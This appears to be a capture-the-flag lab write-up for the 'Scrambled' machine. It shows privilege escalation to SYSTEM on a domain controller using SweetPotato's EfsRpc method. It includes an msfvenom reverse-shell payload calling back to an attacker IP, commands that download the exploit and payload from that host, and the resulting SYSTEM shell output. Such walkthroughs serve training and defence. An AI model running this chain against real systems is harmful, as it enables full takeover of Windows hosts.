InfoSec LAB

Scrambled_Privilege_Escalation_3

Created: 3 min read

SweetPotato

the sqlsvc user has both seassignprimarytokenprivilege and seimpersonateprivilege set. this makes the target system vulnerable to the potato exploits

while juicypotato for token impersonation does not work on anything above windows 10 1809 & windows server 2019, i should be able to use sweetpotato

sweetpotato is a collection of various native windows privilege escalation techniques from service accounts to system. it has been created by @ethicalchaos and includes:

  •     RottenPotato
  •     Weaponized JuciyPotato with BITS WinRM discovery
  •     PrintSpoofer discovery and original exploit
  •     EfsRpc built on EfsPotato
  •     PetitPotam

Exploit

The binary can be downloaded from the official GitHub repo

Exploitation

┌──(kali㉿kali)-[~/…/htb/labs/scrambled/potato]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.9 LPORT=1234 -f exe -o pe.exe
[-] no platform was selected, choosing msf::Module::Platform::Windows from the payload
[-] no arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
payload size: 460 bytes
final size of exe file: 7168 bytes
saved as: pe.exe

msfvenom generated a reverse shell executable

ps c:\Temp> iwr http://10.10.14.9/SweetPotato.exe -outfile C:\Temp\SweetPotato.exe
ps c:\Temp> iwr http://10.10.14.9/pe.exe -outfile C:\Temp\pe.exe

Delivery complete

ps c:\Temp> .\SweetPotato.exe -e EfsRpc -p 'C:\Temp\pe.exe' -l 5555
SweetPotato by @_EthicalChaos_
  Orignal RottenPotato code and exploit by @foxglovesec
  Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery
  PrintSpoofer discovery and original exploit by @itm4n
  EfsRpc built on EfsPotato by @zcgonvh and PetitPotam by @topotam
[+] attempting np impersonation using method efsrpc to launch c:\Temp\pe.exe
[+] Triggering name pipe access on evil PIPE \\localhost/pipe/2c8fd1bb-e14b-4b33-b9ae-cf401cc50ce3/\2c8fd1bb-e14b-4b33-b9ae-cf401cc50ce3\2c8fd1bb-e14b-4b33-b9ae-cf401cc50ce3
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!

The command above uses the EFSRPC method, which targets the MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege This method doesn’t even require tunneling, but requires a binary to launch upon successful exploitation because it launches cmd.exe by default, and I won’t be able to see that as I only have access to console sessions and no interactive sessions.

┌──(kali㉿kali)-[~/…/htb/labs/scrambled/potato]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.11.168] 63771
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
 
c:\Windows\system32> whoami
 whoami
nt authority\system
 
c:\Windows\system32> hostname
 hostname
DC1
 
c:\Windows\system32> ipconfig
 ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0 2:
 
   connection-specific dns suffix  . : htb
   ipv6 address. . . . . . . . . . . : dead:beef::181
   ipv6 address. . . . . . . . . . . : dead:beef::8516:7ac6:78b:c7b
   link-local ipv6 address . . . . . : fe80::8516:7ac6:78b:c7b%14
   ipv4 address. . . . . . . . . . . : 10.10.11.168
   subnet mask . . . . . . . . . . . : 255.255.254.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%14
                                       10.10.10.2

System Level Compromise

Interactive Graph View

Backlinks